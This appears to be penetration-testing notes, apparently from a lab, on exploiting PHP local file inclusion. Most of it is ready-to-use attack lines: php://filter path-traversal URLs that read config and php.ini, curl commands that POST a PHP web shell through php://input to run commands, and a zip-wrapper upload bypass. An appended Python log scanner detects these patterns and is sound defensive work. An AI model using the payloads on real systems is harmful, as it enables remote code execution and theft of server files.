PHP Filters
php://filter/read=convert.base64-encode/resource=config
Pull php.ini
- You should fuzz for version numbers
http://83.136.253.251:41973/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
Curl for data filter
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Curl INPUT filter (POST)
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://83.136.253.251:41973/index.php?language=php://input&cmd=INSERT_COMMAND_HERE" > test.html
Start FTP Server
python -m pyftpdlib -p 21
Impacket SMB Server
impacket-smbserver -smb2support share $(pwd)
Simple Command input PHP
<?php system($_GET["cmd"]); ?>
ZIP Bypass
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
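Detection side (added example, not part of the original notes): a log scanner that flags the wrapper and traversal patterns used in the requests above, including double-encoded variants. The log format, sample lines, addresses and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Stream wrappers that have no business in a file-selection parameter.
WRAPPER_RE = re.compile(r"^\s*(php|zip|phar|data|expect):", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return [(param, reason), ...] for one request target."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        wrapper = WRAPPER_RE.match(value)
        if wrapper:
            findings.append((name, wrapper.group(1).lower() + " wrapper"))
        if TRAVERSAL_RE.search(value):
            findings.append((name, "path traversal"))
    return findings

def scan(log_lines):
    """Return (line_number, param, reason) for every suspicious parameter."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits += [(number, p, r) for p, r in classify(match.group(1))]
    return hits

# Constructed access-log lines (combined format, documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /index.php?language=php%253A%252F%252Finput HTTP/1.1" 200 64',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?language=zip://./profile_images/shell.jpg%23shell.php HTTP/1.1" 200 64',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?language=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

POST bodies are not in access logs, so a php://input hit only shows the trigger request; pair it with request-body logging or WAF telemetry to see the payload.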
PHAR